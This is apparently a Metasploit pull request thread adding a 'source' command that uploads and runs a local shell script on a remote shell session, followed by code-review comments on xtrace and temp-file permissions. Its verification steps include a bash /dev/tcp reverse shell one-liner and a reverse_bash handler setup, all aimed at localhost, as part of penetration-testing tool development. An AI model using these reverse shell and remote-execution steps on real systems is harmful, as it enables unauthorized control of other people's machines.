Add source meta command for shell session

[WangYihang]

Description

Implementation of source command
This command allows attack to execute a local script on the remote machine

Verification

Step 1: Attacker side

./msfconsole -qx 'use multi/handler; \
set payload cmd/unix/reverse_bash; \
set LHOST 127.0.0.1; \
set LPORT 4444; \
exploit'

Step 2: Victim side

bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'

Step 3: Attacker side

Create a shell script file

$ cat ../test/test.sh
#!/bin/bash

date
ip addr
sleep 100

Step 4: Attacker side

• Execute in background

Type `source /tmp/evil.sh n` in metersploit command interface

• Verify the file /tmp/evil.rb in the attacker's machine will be executed on the remote machine in foreground
• Verify after you typed the command source /tmp/evil.sh n, you can execute other commands immediately (eg: uname -a), DO NOT have to wait for the end of the execution

[*] Started reverse TCP handler on 127.0.0.1:4444                                                        
                                                                                                         
source
Usage: source [file] [background]                                                                        
                                                                                                         
Execute a local shell script file on remote machine                                                      
This meta command will upload the script then execute it on the remote machine                           
                                                                                                         
background                                                                                               
`y` represent execute the script in background, `n` represent on foreground                              
source ../test/test.sh n                                                                                 
[*] File <../test/test.sh> size: 27, need 1 times writes to upload                                       
[*] Uploading (256/27)                                                                                   
[+] File </tmp/.driLUHxNXQLmlyHjyKNdilgHqxjZaNXF.sh> upload finished                                     
[*] Executing on remote machine foreground                                                               
+ date                                                                                                   
2018年 08月 22日 星期三 21:46:55 CST                                                                     
+ ip addr                                                                                                
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000              
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00                                                
    inet 127.0.0.1/8 scope host lo                                                                       
       valid_lft forever preferred_lft forever                                                           
    inet6 ::1/128 scope host                                                                             
       valid_lft forever preferred_lft forever                                                           
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    
    link/ether 10:e7:c6:1f:44:84 brd ff:ff:ff:ff:ff:ff                                                   
    inet 10.25.232.80/24 brd 10.25.232.255 scope global dynamic noprefixroute enp1s0                     
       valid_lft 22278sec preferred_lft 22278sec                                                         
    inet6 fe80::e548:b03b:aa8:7518/64 scope link noprefixroute                                           
       valid_lft forever preferred_lft forever                                                           
[*] Cleaning temp file on remote machine                                                                 
uname -a
Linux sun 4.15.0-32-generic #35-Ubuntu SMP Fri Aug 10 17:58:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

[wvu]

Nice use of xtrace to log executed commands!

[WangYihang]

Cool, I will try to test this command~ thank you for your suggestion~

[wvu]

You're already doing it with -x. :)

[WangYihang]

@wvu-r7 Did you mean this tool? https://github.com/johnno1962/Xtrace I found several tools named xtrace, >_<, (strace or ltrace?)

[wvu]

I mean the functionality of set -x, which is called xtrace:

wvu@kharak:~$ help set | grep -- -x | sed \$d
              xtrace       same as -x
      -x  Print commands and their arguments as they are executed.
wvu@kharak:~$

[wvu]

You might want to protect the permissions of this file.

[WangYihang]

Sorry, I didn't understand what you mean. The file created here is for temporary use and after use, it will be deleted. I don't understand why I need to protect the permissions of this file.

[sempervictus]

@WangYihang: TOCTOU concerns about whether you're executing what you intended, or what someone with access to your system (or the path where this file is created on a remotely mounted FS) while you're working is intending (at time of use, of course).

[wvu]

A good start is 0600 for a script executed directly by the shell.

[WangYihang]

Okay, I will update the code.

[busterb]

Jenkins test this please.

[busterb]

Looks good, landing.

[busterb]

Release Notes

This adds a source command for shell sessions that allows running a local shell script remotely in a single step.